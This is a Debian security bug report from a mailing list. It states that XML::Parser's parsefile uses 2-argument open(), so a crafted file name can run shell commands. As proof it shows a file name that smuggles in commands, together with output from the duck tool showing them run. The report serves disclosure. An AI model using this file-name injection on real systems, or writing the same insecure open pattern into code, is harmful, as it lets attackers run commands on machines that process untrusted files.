Bug#923223: XML::Parser::parsefile() uses 2-argument open
Jakub Wilk
jwilk at jwilk.net
Mon Feb 25 08:31:22 GMT 2019
Package: libxml-parser-perl
Version: 2.44-2+b4
Tags: security
Control: affects -1 check-all-the-things duck
The XML::Parser::parsefile function uses 2-argument open().
As a consequence, users of this function can't use it to securely check
files with untrusted names. (Unless the users sanitize the filenames
themselves, which they don't, because AFAICT this behavior is not
documented.)
Proof of concept:
$ touch '; false .appdata; cowsay pwned >&2; kill $PPID |'
$ duck
sh: 1: ./: Permission denied
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Terminated
-- System Information:
Architecture: i386
Versions of packages libxml-parser-perl depends on:
ii perl 5.28.1-4
ii libc6 2.28-7
ii libexpat1 2.2.6-1
ii liburi-perl 1.76-1
ii libwww-perl 6.36-1
--
Jakub Wilk
More information about the pkg-perl-maintainers
mailing list